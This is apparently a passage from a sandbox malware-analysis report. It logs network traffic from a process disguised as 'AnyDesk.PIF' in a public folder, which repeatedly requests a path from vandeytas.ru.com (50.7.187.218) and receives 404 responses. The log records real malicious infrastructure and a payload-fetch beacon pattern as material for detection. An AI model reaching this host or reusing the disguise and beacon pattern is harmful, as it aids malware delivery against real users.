                                                    Nov 26, 2024 09:40:31.913889885 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.341116905 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.341233969 CET49942443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:33.342633009 CET49942443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:33.342653990 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.342897892 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.344466925 CET49942443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:33.387336016 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.861290932 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.861382961 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.861515999 CET49942443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:33.861844063 CET49942443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:33.861867905 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:33.861884117 CET49942443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:33.861890078 CET4434994250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:34.029400110 CET49948443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.029442072 CET4434994850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:34.029531002 CET49948443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.029649019 CET49948443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.029695988 CET4434994850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:34.029751062 CET49948443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.038420916 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.038512945 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:34.038623095 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.038974047 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:34.039028883 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.405199051 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.405275106 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:35.406537056 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:35.406548023 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.406789064 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.407991886 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:35.455333948 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.913198948 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.913276911 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.913347006 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:35.913573027 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:35.913579941 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:35.913600922 CET49949443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:35.913605928 CET4434994950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:36.078970909 CET49954443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.079022884 CET4434995450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:36.079165936 CET49954443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.079272032 CET49954443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.079310894 CET4434995450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:36.079379082 CET49954443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.088102102 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.088169098 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:36.088269949 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.088782072 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:36.088805914 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:37.498001099 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:37.498235941 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:37.567622900 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:37.567656994 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:37.568006992 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:37.569222927 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:37.611335039 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.078931093 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.078994036 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.079040051 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.079265118 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.079287052 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.079301119 CET49955443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.079308033 CET4434995550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.242444992 CET49961443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.242501020 CET4434996150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.242647886 CET49961443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.242856979 CET49961443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.242917061 CET4434996150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.242978096 CET49961443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.251384974 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.251431942 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:38.251538992 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.251899004 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:38.251910925 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:39.660824060 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:39.661000013 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:39.662770987 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:39.662817001 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:39.663084984 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:39.664500952 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:39.707343102 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.179619074 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.179805040 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.179893017 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.180259943 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.180279016 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.180291891 CET49962443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.180299044 CET4434996250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.352231026 CET49968443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.352272034 CET4434996850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.352472067 CET49968443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.630347013 CET49968443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.630419970 CET4434996850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.630492926 CET49968443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.646051884 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.646099091 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:40.646172047 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.646734953 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:40.646744967 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.015738010 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.015913010 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.017303944 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.017353058 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.017607927 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.019361019 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.063332081 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.526945114 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.527026892 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.527101040 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.527503014 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.527523994 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.527537107 CET49969443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.527543068 CET4434996950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.702955008 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.703011990 CET4434997550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.703078032 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.705502033 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.705619097 CET4434997550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.705677986 CET49975443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.714773893 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.714814901 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:42.714895010 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.715262890 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:42.715279102 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.180831909 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.180953026 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.182497025 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.182502985 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.182740927 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.184566021 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.231322050 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722347021 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722429037 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722501040 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.722796917 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.722820044 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.722834110 CET49976443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.722839117 CET4434997650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.894809961 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.894861937 CET4434998250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.894933939 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.895025969 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.895070076 CET4434998250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.895127058 CET49982443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970489025 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970515013 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:44.970573902 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970968008 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:44.970976114 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.387054920 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.387362003 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.388717890 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.388748884 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.389127016 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.393414974 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.439337015 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.905930996 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.906107903 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.906198025 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.906322002 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.906342030 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:46.906435013 CET49983443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:46.906440973 CET4434998350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.073807955 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.073820114 CET4434998950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.073906898 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.074016094 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.074059010 CET4434998950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.074114084 CET49989443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083383083 CET49990443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083431005 CET4434999050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:47.083553076 CET49990443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083801031 CET49990443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:40:47.083812952 CET4434999050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:48.493628025 CET4434999050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:40:48.493864059 CET49990443192.168.2.450.7.187.218

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 26, 2024 09:38:45.865753889 CET6044053192.168.2.41.1.1.1
                                                    Nov 26, 2024 09:38:46.865282059 CET53604401.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 26, 2024 09:38:45.865753889 CET192.168.2.41.1.1.10xe4b2Standard query (0)vandeytas.ru.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 26, 2024 09:38:46.865282059 CET1.1.1.1192.168.2.40xe4b2No error (0)vandeytas.ru.com50.7.187.218A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • vandeytas.ru.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.44973150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:38:48 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:38:49 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:38:48 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:38:49 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.44973350.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:38:50 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:38:51 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:38:51 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:38:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.44973550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:38:52 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:38:53 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:38:53 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:38:53 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.44973750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:38:55 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:38:55 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:38:55 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:38:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.44973950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:38:57 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:38:58 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:38:57 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:38:58 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.44974150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:38:59 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:39:00 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:39:00 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:39:00 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.44974450.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
